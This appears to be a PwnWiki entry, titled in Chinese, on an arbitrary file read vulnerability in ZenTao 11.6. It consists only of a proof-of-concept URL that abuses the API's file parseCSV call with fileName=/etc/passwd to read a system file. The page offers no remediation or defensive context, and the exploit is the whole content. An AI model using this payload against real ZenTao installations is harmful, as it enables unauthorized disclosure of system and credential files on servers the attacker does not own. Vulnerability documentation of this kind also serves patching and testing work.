禪道 11.6 任意文件讀取漏洞

From PwnWiki

POC

http://127.0.0.1/zentaopms_11.6/www/api-getModel-file-parseCSV-fileName=/etc/passwd